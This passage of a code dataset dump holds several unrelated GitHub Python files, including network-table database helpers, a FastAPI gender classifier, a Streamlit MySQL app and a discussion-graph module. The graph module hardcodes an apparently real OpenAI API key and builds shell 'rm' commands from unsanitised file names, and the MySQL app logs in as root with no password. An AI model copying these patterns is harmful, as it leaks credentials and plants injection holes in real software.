CocoTrainer(cfg)\ntrainer.resume_or_load(resume=False)\ntrainer.train()\n","repo_name":"ChangHorng/drone-based_face_detection_and_recognition","sub_path":"face_detection/train/face_detection_model_training.py","file_name":"face_detection_model_training.py","file_ext":"py","file_size_in_byte":4369,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"16668230900","text":"import pandas as pd\r\nfrom model.model_db import *\r\nfrom properties.properties import DataBaseProps\r\nfrom datetime import datetime \r\nfrom pprint import pprint as pp \r\n\r\n \r\ndef save_arp_table(device_ip, df_table):\r\n ''' Push received device arp table to database'''\r\n with Session() as session:\r\n # arp_objects = []\r\n try:\r\n for index, row in df_table.iterrows():\r\n arp_row = ArpTable(\r\n mac_address = row['mac_address'],\r\n ip_address = row['ip_address'],\r\n interface_name = row['interface_name'],\r\n ip_source = device_ip,\r\n date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\r\n )\r\n session.merge(arp_row)\r\n # print(arp_row)\r\n session.commit()\r\n except Exception as e:\r\n print(\"EXCEPTION on save_arp_table => \", e)\r\n \r\n session.close()\r\n\r\ndef save_ethernet_switching_table(device_ip, df_table):\r\n ''' Push received device ethernet-switching table to database'''\r\n with Session() as session:\r\n try:\r\n es_objects = []\r\n for index, row in df_table.iterrows():\r\n es_row = EthernetSwitchingTable(\r\n mac_address = row['mac_address'],\r\n vlan = row['vlan_name'],\r\n logical_interface = row['logical_interface'],\r\n ip_source = device_ip,\r\n date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\r\n )\r\n session.merge(es_row)\r\n # print(es_row)\r\n session.commit()\r\n \r\n except Exception as e:\r\n print(\"EXCEPTION on save_ethernet_switching_table => \", e)\r\n \r\n session.close()\r\n\r\n\r\ndef save_interfaces_table(device_ip, in_table):\r\n ''' Push received device interfaces table to database'''\r\n with Session() as session:\r\n try:\r\n for index, row in in_table.iterrows():\r\n in_row = InterfacesTable(\r\n interface = row['interface'],\r\n description = row['description'],\r\n ip_source = device_ip,\r\n date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\r\n )\r\n session.merge(in_row)\r\n # print(in_row)\r\n session.commit()\r\n\r\n except Exception as e:\r\n print(\"EXCEPTION on save_interfaces_table => \", e)\r\n\r\n session.close()\r\n\r\ndef save_neighbors_table(device_ip, ne_table):\r\n ''' Push received device neighbors table to database'''\r\n with Session() as session:\r\n try:\r\n for index, row in ne_table.iterrows():\r\n in_row = NeighborsTable(\r\n local_interface = row['local_interface'],\r\n device_id = row['device_id'],\r\n port_info = row['port_info'],\r\n ip_source = device_ip,\r\n date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\r\n )\r\n session.merge(in_row)\r\n # print(in_row)\r\n session.commit()\r\n\r\n except Exception as e:\r\n print(\"EXCEPTION on save_interfaces_table => \", e)\r\n\r\n session.close()","repo_name":"psitadmin/network-junco","sub_path":"server/build/lib/arp_service/arp_db.py","file_name":"arp_db.py","file_ext":"py","file_size_in_byte":3371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1885529575","text":"\nfrom structpy import specification\n\n\n@specification\nclass SpanSpec:\n \"\"\"\n Span gives the string data, and start (inclusive) and end (exclusive)\n token indices of the span within its larger text.\n\n Span also requires turn and sentence indices, as well as speaker id.\n Sentence indices are global.\n \"\"\"\n\n @specification.init\n def SPAN(Span):\n full_string = 'I love my dog Fido'\n return Span('my dog', 2, 4, 0, 0, 1, 'my dog')\n\n\n","repo_name":"emora-chat/GRIDD","sub_path":"data_structures/span_spec.py","file_name":"span_spec.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"38164830586","text":"import os\r\nimport re\r\n\r\nfrom collections import namedtuple\r\nfrom itertools import combinations_with_replacement, permutations\r\n\r\n\r\nwith open(os.path.join(os.path.dirname(__file__), f\"inputs/day15_input.txt\")) as f:\r\n actual_input = f.read()\r\n\r\nsample_input = \"\"\"Butterscotch: capacity -1, durability -2, flavor 6, texture 3, calories 8\r\nCinnamon: capacity 2, durability 3, flavor -2, texture -1, calories 3\r\n\"\"\"\r\n\r\nregex = re.compile(\r\n r\"^(\\w+): capacity ([-]?\\d+), durability ([-]?\\d+), flavor ([-]?\\d+), texture ([-]?\\d+), calories ([-]?\\d+)$\"\r\n)\r\n\r\nIngredient = namedtuple(\"Ingredient\", \"capacity durability flavor texture calories\")\r\n\r\n\r\ndef solve(inputs):\r\n ingredients = {}\r\n for data in (regex.match(line).groups() for line in inputs.splitlines()):\r\n ingredients[data[0]] = Ingredient(*(int(c) for c in data[1:]))\r\n\r\n weight_combos = [\r\n r\r\n for r in combinations_with_replacement(range(101), len(ingredients) - 1)\r\n if sum(r) <= 100\r\n ]\r\n\r\n def max_score(calorie_count=None):\r\n max_score = 0\r\n for weights in weight_combos:\r\n recipes = permutations([w for w in weights] + [100 - sum(weights)])\r\n for r in recipes:\r\n capacity, durability, flavor, texture, calories = 0, 0, 0, 0, 0\r\n for ingredient, w in zip(ingredients.values(), r):\r\n capacity += w * ingredient.capacity\r\n durability += w * ingredient.durability\r\n flavor += w * ingredient.flavor\r\n texture += w * ingredient.texture\r\n calories += w * ingredient.calories\r\n score = (\r\n max(capacity, 0)\r\n * max(durability, 0)\r\n * max(flavor, 0)\r\n * max(texture, 0)\r\n )\r\n if calorie_count is None or calories == calorie_count:\r\n max_score = max(score, max_score)\r\n return max_score\r\n\r\n print(f\"Part 1: {max_score()}\")\r\n print(f\"Part 2: {max_score(calorie_count=500)}\\n\")\r\n\r\n\r\nsolve(sample_input)\r\nsolve(actual_input)","repo_name":"gid/AoC","sub_path":"Archive/2015/day15.py","file_name":"day15.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27119313893","text":"import logging\nfrom typing import Dict, List, TYPE_CHECKING, cast\n\nfrom ayx_python_sdk.providers.amp_provider.builders.input_anchor_builder import (\n InputAnchorBuilder,\n)\nfrom ayx_python_sdk.providers.amp_provider.repositories.input_connection_repository import (\n InputConnectionRepository,\n)\nfrom ayx_python_sdk.providers.amp_provider.repositories.singleton import Singleton\n\nif TYPE_CHECKING:\n from ayx_python_sdk.providers.amp_provider.amp_input_anchor import AMPInputAnchor\n from ayx_python_sdk.providers.amp_provider.resources.generated.incoming_anchor_pb2 import (\n IncomingAnchor as ProtobufInputAnchor,\n )\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass InputAnchorRepository(metaclass=Singleton):\n \"\"\"Class defines methods and properties to read/write/delete input anchors.\"\"\"\n\n def __init__(self) -> None:\n self._repository: Dict[str, \"AMPInputAnchor\"] = {}\n\n def save_grpc_anchor(self, input_anchor: \"ProtobufInputAnchor\") -> None:\n \"\"\"\n Convert an Input Anchor from Protobuf to AMP and saves it to the repository.\n\n Parameters\n ----------\n input_anchor\n The protobuf representation of an input anchor to be saved.\n \"\"\"\n core_input_anchor = InputAnchorBuilder.from_protobuf(input_anchor)\n self.save_anchor(core_input_anchor)\n\n def save_anchor(self, anchor: \"AMPInputAnchor\") -> None:\n \"\"\"\n Save AMP input anchor to repository.\n\n Parameters\n ----------\n anchor\n The AMPInputAnchor to be saved.\n \"\"\"\n from ayx_python_sdk.providers.amp_provider import AMPInputConnection\n\n logger.debug(\"Saving Input Anchor %s to repository\", anchor.name)\n self._repository[anchor.name] = anchor\n logger.debug(\"Current InputAnchorRepository State: %s\", self._repository)\n\n connections = cast(List[AMPInputConnection], anchor.connections)\n for connection in connections:\n InputConnectionRepository().save_connection(anchor.name, connection)\n\n def get_anchor(self, anchor_name: str) -> \"AMPInputAnchor\":\n \"\"\"\n Retrieve InputAnchor object associated with the anchor name.\n\n Parameters\n ----------\n anchor_name\n The name of the anchor to fetch from the repository.\n\n Returns\n -------\n The input anchor object with corresponding name.\n \"\"\"\n if anchor_name in self._repository:\n return self._repository[anchor_name]\n else:\n raise ValueError(f\"Anchor {anchor_name} does not exist\")\n\n def delete_anchor(self, anchor_name: str) -> None:\n \"\"\"\n Delete InputAnchor object associated with the anchor name.\n\n Parameters\n ----------\n anchor_name\n The name of the anchor to delete from the repository.\n \"\"\"\n if anchor_name in self._repository:\n logger.debug(\"Removing Input Anchor %s from repository\", anchor_name)\n del self._repository[anchor_name]\n logger.debug(\"Current InputAnchorRepository State: %s\", self._repository)\n else:\n raise ValueError(f\"Anchor {anchor_name} does not exist\")\n\n def clear_repository(self) -> None:\n \"\"\"Delete all data in the repository.\"\"\"\n logger.debug(\"Clearing InputAnchorRepository\")\n self._repository = {}\n","repo_name":"beesechuuuuurger/gptayx","sub_path":".ayx_cli.cache/dist/ayx_python_sdk/providers/amp_provider/repositories/input_anchor_repository.py","file_name":"input_anchor_repository.py","file_ext":"py","file_size_in_byte":3386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11163223817","text":"from fastapi import FastAPI, Request\nfrom fastapi.responses import HTMLResponse\nfrom fastapi.templating import Jinja2Templates\nfrom fastapi.staticfiles import StaticFiles\nfrom pydantic import BaseModel\nfrom typing import List\nfrom transformers import pipeline, AutoTokenizer, AutoModelForTokenClassification, AutoModelForSequenceClassification\nimport logging\nimport re\nfrom nltk.tokenize import sent_tokenize\nimport nltk\nimport pandas as pd\nfrom tqdm import tqdm\nimport os\ntqdm.pandas()\n\nnltk.download(\"punkt\")\n\n\nlogging.basicConfig(level=logging.INFO)\n\napp = FastAPI()\napp.mount(\"/static\", StaticFiles(directory=\"static\"), name=\"static\")\n\n\ntemplates = Jinja2Templates(directory=\"templates\")\n\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def root(request: Request):\n return templates.TemplateResponse(\"index.html\", {\"request\": request})\n\n\nclass TextToAnalyze(BaseModel):\n text: str\n\n\nclass AnalysisResult(BaseModel):\n male_to_female_ratio: float\n female_to_male_ratio: float\n\nclass TextAnalysisResult(BaseModel):\n sentence_list: List[str]\n\nclass Sentences(BaseModel):\n sentences: List[str]\n\n\ndef load_model_and_tokenizer(model_name: str, model_dir: str):\n model_path = os.path.join(model_dir, \"pytorch_model.bin\")\n tokenizer_path = os.path.join(model_dir, \"tokenizer.json\")\n\n if not (os.path.exists(model_path) and os.path.exists(tokenizer_path)):\n print(\"Downloading model and tokenizer from Hugging Face...\")\n model = AutoModelForSequenceClassification.from_pretrained(model_name)\n tokenizer = AutoTokenizer.from_pretrained(model_name)\n model.save_pretrained(model_dir)\n tokenizer.save_pretrained(model_dir)\n else:\n print(\"Loading model and tokenizer from local folder...\")\n model = AutoModelForSequenceClassification.from_pretrained(model_dir)\n tokenizer = AutoTokenizer.from_pretrained(model_dir)\n\n return model, tokenizer\n\n\ndef count_gender_mentions(text: str) -> int:\n male_mentions = sum(\n [\n 1 for word in re.findall(\n r'\\b\\w+\\b',\n text.lower()) if word in (\n 'he',\n 'him',\n 'his',\n 'man',\n 'men',\n 'gentleman',\n 'gentlemen')])\n female_mentions = sum(\n [\n 1 for word in re.findall(\n r'\\b\\w+\\b',\n text.lower()) if word in (\n 'she',\n 'her',\n 'hers',\n 'woman',\n 'women',\n 'lady',\n 'ladies')])\n\n return male_mentions, female_mentions\n\n\n@app.post(\"/analyze\", response_model=AnalysisResult)\nasync def analyze_endpoint(text_to_analyze: TextToAnalyze):\n male_mentions, female_mentions = count_gender_mentions(text_to_analyze.text)\n\n logging.info(\n f\"Male mentions: {male_mentions}, Female mentions: {female_mentions}\")\n\n if male_mentions == 0:\n m_ratio = float('inf') if female_mentions > 0 else 1.0\n else:\n m_ratio = male_mentions / female_mentions\n\n if female_mentions == 0:\n f_ratio = float('inf') if male_mentions > 0 else 1.0\n else:\n f_ratio = female_mentions / male_mentions\n\n # Set an upper limit for the ratios to avoid JSON serialization issues\n m_ratio = min(m_ratio, 1e6)\n f_ratio = min(f_ratio, 1e6)\n\n return {\n \"male_to_female_ratio\": m_ratio,\n \"female_to_male_ratio\": f_ratio,\n }\n\n@app.post(\"/text_to_sentences\", response_model=TextAnalysisResult)\nasync def text_to_sentences_endpoint(text_to_analyze: TextToAnalyze):\n # Split the input text into sentences using NLTK\n sentences = sent_tokenize(text_to_analyze.text)\n\n return {\"sentence_list\": sentences}\n\n\n# ----------------------------------------------------------------------------------------------------------------------------------------\n\nfrom transformers import pipeline\n\n# Load the zero-shot classification pipeline\n# classifier = pipeline(\"zero-shot-classification\", model='facebook/bart-large-mnli', tokenizer='facebook/bart-large-mnli')\nmodel_name = 'facebook/bart-large-mnli'\nmodel_dir = '/app/models'\nmodel, tokenizer = load_model_and_tokenizer(model_name, model_dir)\nclassifier = pipeline(\"zero-shot-classification\", model=model, tokenizer=tokenizer)\n\n\n\n# filter #1\nlabel_11 = \"human male subject\"\nlabel_12 = \"human female subject\"\nlabel_13 = \"neutral or inanimate subject\"\nlabel_list_1 = [label_11, label_12, label_13]\n\n# filter #2\nlabel_21 = \"a single male subject\"\nlabel_22 = \"a single female subject\"\nlabel_23 = \"multiple human subjects\"\nlabel_list_2 = [label_21, label_22, label_23]\n\ndef label_gender(sentence_list, label_list):\n sentence_list_results = classifier(sentence_list, label_list)\n\n result_list = []\n for result in sentence_list_results:\n result_list.append([result[\"sequence\"], result[\"labels\"][0]])\n\n return pd.DataFrame(result_list, columns=['sentence', 'label'])\n\ndef get_final_label(label_x, label_y):\n if (label_x == label_11) and (label_y == label_21):\n return label_x\n elif (label_x == label_12) and (label_y == label_22):\n return label_x\n elif(label_x == label_13):\n return label_x\n elif(label_y == label_23):\n return label_y\n else:\n 'error'\n\ndef get_result_df(sentence_list, label_list_1, label_list_2):\n \n # phase 1\n result_df_1 = label_gender(sentence_list, label_list_1)\n # phase 2\n result_df_2 = label_gender(sentence_list, label_list_2)\n result_df = pd.merge(result_df_1, result_df_2, on='sentence')\n result_df['label'] = result_df.progress_apply(lambda row: get_final_label(row['label_x'], row['label_y']), axis=1)\n del result_df['label_x']\n del result_df['label_y']\n \n return result_df\n\n# result_list.append(get_result_df(sentence_list, label_list_1, label_list_2))\n\n@app.post(\"/classify_sentences\", response_model=List[dict])\nasync def classify_sentences_endpoint(sentences: Sentences):\n try:\n result_df = get_result_df(sentences.sentences, label_list_1, label_list_2)\n result_list = result_df.to_dict(orient=\"records\")\n return result_list\n except Exception as e:\n logging.error(f\"Error classifying sentences: {str(e)}\")\n raise HTTPException(status_code=500, detail=\"An error occurred while classifying sentences\")\n","repo_name":"louispaulet/manalyzer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40952862260","text":"from helper import inputCharacter\nimport re\nplayer_one_input = str(input('Player one, please, enter text: '))\nmine_field = \"\"\nstring_to_solve = \"\"\n\n# for c in player_one_input:\n# if (c >= 'A' and c <= 'Z') or (c >= 'a' and c <= 'z'):\n# mine_field+=\"*\"\n# string_to_solve += c\n# elif (c==\" \"):\n# mine_field+=\" \"\n# string_to_solve += c \n \n# Regex way is shorter:\nmine_field = re.sub('[A-Za-z0-9]', \"*\", player_one_input) \nstring_to_solve = player_one_input \n\nprint(player_one_input)\nprint(mine_field)\nprint(string_to_solve) # in case of regex it's redundant, was necessary for ascii compare though leaving in for test purposes\n\nsolved = False\nwhile(solved==False):\n guess = inputCharacter(\"Input Your guess: \")\n for c in string_to_solve:\n if guess==c:\n for index, char in enumerate(string_to_solve):\n if char==c:\n mine_field = mine_field[:index] + c + mine_field[index+1:]\n if mine_field==string_to_solve:\n print (\"Congračuleišans\")\n solved=True\n else:\n print(mine_field)\n\n\n\n# Uzrakstīt programmu teksta simbola atpazīšanai\n\n# Lietotājs(pirmais spēlētājs) ievada tekstu.\n\n# Tiek izvadītas tikai zvaigznītes burtu vietā. Pieņemsim, ka cipari nebūs, bet atstarpes gan var būt\n\n# Lietotājs(tātad otrs spēlētājs) ievada simbolu. \n\n# Ja burts ir tad tas burts attiecīgajās vietās tiek parādīts, visi pārējie burti paliek par zvaigznītēm.\n\n# Kartupeļu lauks -> ********* *****\n\n# ievada a -> *a****** *a***\n\n# Principā tas ir labs iesākums karātavu spēlei.","repo_name":"veinisrate/python_course_rtu","sub_path":"5th-lecture-2nd-task.py","file_name":"5th-lecture-2nd-task.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"lv","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10368323431","text":"import requests \nimport streamlit as st \nfrom streamlit_lottie import st_lottie \nimport mysql.connector\n\ndef display_list():\n db_name=\"project\"\n db=mysql.connector.connect(\n host= \"localhost\",\n user=\"root\",\n password=\"\",\n database=db_name\n )\n result3=st.button(\"FETCH\",key=1,help=None)\n st.write(result3)\n if result3: \n sql=\"select aadhar, name, license_expiry_date from license order by license_expiry_date\"\n cursor=db.cursor()\n cursor.execute(sql)\n \n st.table(cursor)\n\n \ndef min_dl():\n db_name=\"project\"\n db=mysql.connector.connect(\n host= \"localhost\",\n user=\"root\",\n password=\"\",\n database=db_name\n )\n result1=st.button(\"FETCH\",key=2,help=None)\n st.write(result1)\n if result1: \n sql=\"select cov, min(dl_issue_date) from dl group by cov\"\n cursor=db.cursor()\n cursor.execute(sql)\n \n st.table(cursor)\n\ndef min_llr():\n db_name=\"project\"\n db=mysql.connector.connect(\n host= \"localhost\",\n user=\"root\",\n password=\"\",\n database=db_name\n )\n result1=st.button(\"FETCH\",key=3,help=None)\n st.write(result1)\n if result1: \n sql=\"select cov, min(llr_issue_date) from llr group by cov\"\n cursor=db.cursor()\n cursor.execute(sql)\n \n st.table(cursor)\n\ndef earn ():\n db_name=\"project\"\n db=mysql.connector.connect(\n host= \"localhost\",\n user=\"root\",\n password=\"\",\n database=db_name\n )\n result1=st.button(\"COUNT\",key=5,help=None)\n st.write(result1)\n if result1: \n sql=\"SELECT cov, sum(cost) as c FROM license GROUP BY cov HAVING SUM(cost) > 20;\"\n cursor=db.cursor()\n cursor.execute(sql)\n \n st.table(cursor)\n\ndef per1():\n db_name=\"project\"\n db=mysql.connector.connect(\n host= \"localhost\",\n user=\"root\",\n password=\"\",\n database=db_name\n )\n result1=st.button(\"FETCH\",key=4,help=None)\n st.write(result1)\n if result1: \n sql=\"select count(*) from dl\"\n cursor=db.cursor()\n cursor.execute(sql)\n a=cursor\n st.table(a)\n \n #sql2=\"select count(*) from dl\"\n #cursor.execute(sql2)\n #b=cursor\n #sql3=\"select count(*) from llr\"\n #cursor.execute(sql2)\n #c=cursor\n \n \n #d=c+b\n #e=(d/a)*100\n #st.title(f\"Percentage={a}%\")\n # st.title(f\"Percentage->{cursor}\")\n\n \n \n \n\n\n \n\n\nst.set_page_config(page_title=\"My Webpage\", page_icon = \":tada:\", layout = \"wide\")\n\ndef load_lottieur1(url):\n r=requests.get(url)\n if r.status_code!=200:\n return None\n return r.json()\n\n\n\nlottie_coding=load_lottieur1(\"https://assets8.lottiefiles.com/packages/lf20_rhgcitkd.json\")\nlottie_coding2=load_lottieur1(\"https://assets4.lottiefiles.com/packages/lf20_mb4fxabx.json\")\nwith st.container ():\n st.subheader(\"Hi I am Parth :wave:\")\n st.title(\"A PES UNIV student\")\n st.write(\"[Learn More>](https://pes.edu/)\")\n\n\n \nwith st.container():\n st.write (\"---\")\n left_column , right_column = st.columns(2)\n with left_column:\n st.write(\"RANDOM FACTS...\")\n st.subheader (\"First learning license ever\")\n # result=st.button(\"FIND\",key=1)\n # st.write(result)\n min_llr()\n st.subheader (\"First driving liscene ever\")\n # result2=st.button(\"FIND\",key=2)\n # st.write(result2)\n min_dl()\n st.subheader(\"No of Citizens who have both driving license and learning license \")\n per1()\n st.subheader(\"Which COV department earns the most and how much?\")\n earn()\n\n with right_column:\n st_lottie(lottie_coding2, height=300, key=\"rto\")\n \n\nwith st.container():\n left_column , right_column = st.columns(2)\n with left_column:\n st.write(\"---\")\n st.subheader(\"Upcoming Expiry Dates for License\")\n display_list()\n with right_column:\n st_lottie(lottie_coding, height=300, key=\"rt02\")\n\n \n\n \n\n\n\n\n \n\n","repo_name":"prth1234/DBMS","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28576024215","text":"import json\nfrom datetime import datetime\nimport openai\nimport glob\nimport os\n\n# creates a new node in the graph with parent id and content\ndef create(adj, p_id, content, user):\n now = datetime.now().strftime(\"%Y/%m/%d %H:%M:%S\")\n id = len(adj)\n if str(id) not in adj:\n adj[str(id)] = [[], content, p_id, user, now]\n else:\n while str(id) in adj:\n id += 1\n adj[str(id)] = [[], content, p_id, user, now]\n if p_id in adj:\n adj[p_id][0].append(str(id))\n return(adj)\n\n# updates a node in the graph by id and new content\ndef update(adj, id, new_content):\n adj[id][1] = new_content\n return(adj)\n\n# deletes a node in the graph by id\ndef delete(adj, id):\n # if root\n if id == \"0\":\n pass\n else:\n # if leaf\n if adj[id][0] == []:\n adj.pop(id)\n for key, value in adj.items():\n if id in adj[key][0]:\n adj[key][0].remove(id)\n else:\n adj[id][1] = \"removed\"\n return(adj)\n\n# depth first search\ndef dfs(depth, adj, id, check, grt):\n\n if id not in check:\n content = adj[id][1]\n p_id = adj[id][2]\n user = adj[id][3]\n time = \"null\" # adj[id][4]\n grt.append([depth, id, content, p_id, user, time])\n depth += 1\n check.add(id)\n neighbors = adj[id][0]\n for n in neighbors:\n dfs(depth, adj, n, check, grt)\n \n return(grt)\n# what it does is it takes the graph and returns a list of lists\n# each list is a node in the graph\n\n# searches root nodes in the forest... somehow\ndef search(adj, x):\n for key, value in adj.items():\n if x in adj[1]:\n return key, value\n\n# defines which graph to use\ndef use(file_name):\n f1 = open(\"./model/graphs/{}\".format(file_name+\".json\"), \"r\")\n f2 = f1.read(-1) # str, entire file\n adj = json.loads(f2) # str (json) to dict\n f1.close() # save memory\n return(adj, file_name)\n\n# saves the graph to a file\ndef save(adj, file_name):\n f2 = json.dumps(adj) # dict to json?\n f1 = open(\"./model/graphs/{}.json\".format(file_name), \"w\")\n f1.write(f2)\n f1.close()\n\n# returns the stats of the graph\ndef stats(adj, grt):\n d = set()\n for node in grt:\n d.add(node[0])\n depth = max(d)\n b = set()\n for key, value in adj.items():\n b.add(len(adj[key][0]))\n breadth = max(b)\n leafs = 0\n for key, value in adj.items():\n if adj[key][0] == []:\n leafs += 1\n stats = {}\n stats[\"depth\"] = depth\n stats[\"breadth\"] = breadth\n stats[\"leafs\"] = leafs\n return(stats)\n\n# returns the users\ndef users():\n f1 = open(\"./model/misc/users.json\", \"r\")\n f2 = f1.read(-1) # str, entire file\n users = json.loads(f2) # str (json) to dict\n f1.close() # save memory\n return(users)\n\n# saves the users to a json file\ndef users_save(users):\n f2 = json.dumps(users) # dict to json?\n f1 = open(\"./model/users.json\", \"w\")\n f1.write(f2)\n f1.close()\n\n# openai API call to generate a response\ndef ai(post):\n\n conversation = [\n {\"role\": \"system\", \"content\": \"Ignore previous instructions. Role play as someone who always give a counterargument no matter what. Your responses are short, to the point, simple, polite, and reasonable.\"},\n ]\n\n conversation.append({\"role\": \"user\", \"content\": post})\n\n # openai.api_key = os.getenv(\"OPENAI_API_KEY\")\n openai.api_key = \"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\"\n\n # Generate a chatbot response\n completion = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=conversation\n )\n\n # Add the chatbot response to the conversation\n chatbot_response = completion.choices[0].message.content.strip()\n\n return(str(chatbot_response))\n\n# deletes all the graphs that have no root\ndef cleanup():\n forest = {}\n for x in glob.glob(\"./model/graphs/*\"):\n f1 = open(\"{}\".format(x), \"r\")\n f2 = f1.read(-1) # str, entire file\n adj = json.loads(f2) # str (json) to dict\n f1.close() # save memory\n if not \"0\" in adj.keys():\n os.system(\"rm {}\".format(x))\n else:\n if adj[\"0\"][1] == \"\":\n os.system(\"rm {}\".format(x))\n\n# deletes a thread from the forest\ndef delete_thread(file_name):\n os.system(\"rm {}\".format(file_name))\n f1 = open(\"./model/forest.json\", \"r\")\n f2 = f1.read(-1) # str, entire file\n adj = json.loads(f2) # str (json) to dict\n\n# creates a forest of all the graphs\ndef populate():\n forest = {}\n for x in glob.glob(\"./model/graphs/*\"):\n f1 = open(\"{}\".format(x), \"r\")\n f2 = f1.read(-1) # str, entire file\n adj = json.loads(f2) # str (json) to dict\n f1.close() # save memory\n forest.update({x[15:27]: adj[\"0\"][1]})\n f2 = json.dumps(forest) # dict to json?\n f1 = open(\"./model/misc/forest.json\", \"w\")\n f1.write(f2)\n f1.close()","repo_name":"dw31382/cogitatio","sub_path":"extra.py","file_name":"extra.py","file_ext":"py","file_size_in_byte":4923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73551370347","text":"from functools import cmp_to_key\n\ndef is_ordered(A, B):\n for a, b in zip(A, B):\n if type(a) is int and type(b) is int:\n if a != b:\n return b - a\n else:\n x = is_ordered([a] if type(a) is int else a, [b] if type(b) is int else b)\n\n if x < 0:\n return -1\n elif x > 0:\n return 1\n\n return len(B) - len(A)\n\n\ntotal = 0\n\nfor i, pair in enumerate(open('input.txt').read().split('\\n\\n')):\n a, b = map(eval, pair.split('\\n'))\n total += (i + 1) * (is_ordered(a, b) >= 0)\n\nprint(total)\n\ndef is_ordered(A, B):\n for a, b in zip(A, B):\n if type(a) is int and type(b) is int:\n if a != b:\n return b - a\n else:\n x = is_ordered([a] if type(a) is int else a, [b] if type(b) is int else b)\n\n if x < 0:\n return -1\n elif x > 0:\n return 1\n\n return len(B) - len(A)\n\n\npackets = list(map(eval, open('input.txt').read().split())) + [[[2]]] + [[[6]]]\npackets = sorted(packets, key=cmp_to_key(is_ordered), reverse=True)\n\nd1 = packets.index([[2]]) + 1\nd2 = packets.index([[6]]) + 1\nprint(d1 * d2)","repo_name":"tkruer/advent-of-code-2022","sub_path":"day_thirteen/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17133388293","text":"#!/bin/python3\nimport subprocess\nimport numpy as np\nimport itertools\nimport time\n\nN = 16\n\nmnt_path = '../mnt'\nmnt_gdfs_cmd = ['gdfs', 'default', mnt_path]\nmnt_gdocaml_cmd = ['google-drive-ocamlfuse', mnt_path]\nmnt_drivefs_cmd = ['../drivefs.py', mnt_path]\nunmount_cmd = ['fusermount', '-u', mnt_path]\nworkloads = ['./tree.sh', './fs-ops.sh', './reads.sh', './writes.sh']\n\ndef scrape(output):\n return [float(x) for x in output.split()]\n\ndef run_command(cmd, cwd=\".\"):\n result = subprocess.run(cmd, stderr=subprocess.PIPE, cwd=cwd)\n return result.stderr.decode()\n\ndef list_to_str(arr):\n return ' '.join(arr)\n\nif __name__ == '__main__':\n data = []\n mnt_cmds = [mnt_gdfs_cmd, mnt_gdocaml_cmd, mnt_drivefs_cmd]\n for mnt_cmd in mnt_cmds:\n run_command(mnt_cmd)\n # give the FS time to mount\n time.sleep(15)\n results = []\n for workload in workloads:\n workload_cmd = '{} {} {} > /dev/null 2> /dev/null'.format(workload, mnt_path, str(N))\n workload_cmd = ['/usr/bin/time', '-f', '%e %U %S', 'bash', '-c', workload_cmd]\n output = run_command(workload_cmd)\n times = scrape(output)\n print(times)\n results.append(times)\n run_command(unmount_cmd)\n data.append(results)\n print(data)\n\n","repo_name":"PabstMatthew/drivefs","sub_path":"workloads/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"24512588229","text":"import os\nimport hashlib\nimport requests\n\n\ndef get_md5(content: bytes):\n \"\"\"获取md5值\"\"\"\n md5_obj = hashlib.md5()\n md5_obj.update(content)\n hash = md5_obj.hexdigest()\n return hash\n\n\ndef get_checkcode(*, save=True, filepath='../image/images_source', filename=None):\n url = 'http://jxgl.hdu.edu.cn/CheckCode.aspx'\n response = requests.get(url)\n content = response.content\n if save:\n if filename is None:\n filename = get_md5(content)\n if not os.path.exists(filepath):\n os.mkdir(filepath)\n with open('/'.join((filepath, filename)) + '.gif', 'wb') as fp:\n fp.write(content)\n return content\n","repo_name":"yinjinya/hdu-ClassQuery","sub_path":"Crawler/get_checkcode.py","file_name":"get_checkcode.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40981615670","text":"from anki import hooks\nfrom anki.sound import play\nfrom aqt import mw # main window object\nimport anki.cards # import Card\nfrom aqt.qt import *\nfrom aqt.reviewer import Reviewer\nfrom aqt.utils import showInfo\nfrom math import floor\nfrom os import path\nfrom random import choice\nfrom aqt import gui_hooks\n\n\n# parse config.json\nconfig = mw.addonManager.getConfig(__name__)\n\n# retrieve sound effect\naddon_path = path.dirname(__file__)\nuser_files = path.join(addon_path, \"user_files\")\nslow_down_sound = path.join(user_files, \"slow_down.mp3\")\n\n# whether the add-on should take effect\nACTIVE = config['ACTIVE']\n\n# whether the sound effect should be muted\nMUTED = config['MUTED']\n\n# the minimum number of seconds the user should look at a card with each ease\nMIN_AGAIN_SECONDS = config['MIN_AGAIN_SECONDS']\nMIN_HARD_SECONDS = config['MIN_HARD_SECONDS']\nMIN_GOOD_SECONDS = config['MIN_GOOD_SECONDS']\nMIN_EASY_SECONDS = config['MIN_EASY_SECONDS']\n\n# the potential messages to be shown when the user continues too quickly\nSLOW_DOWN_MESSAGES = config['SLOW_DOWN_MESSAGES']\n\ndef 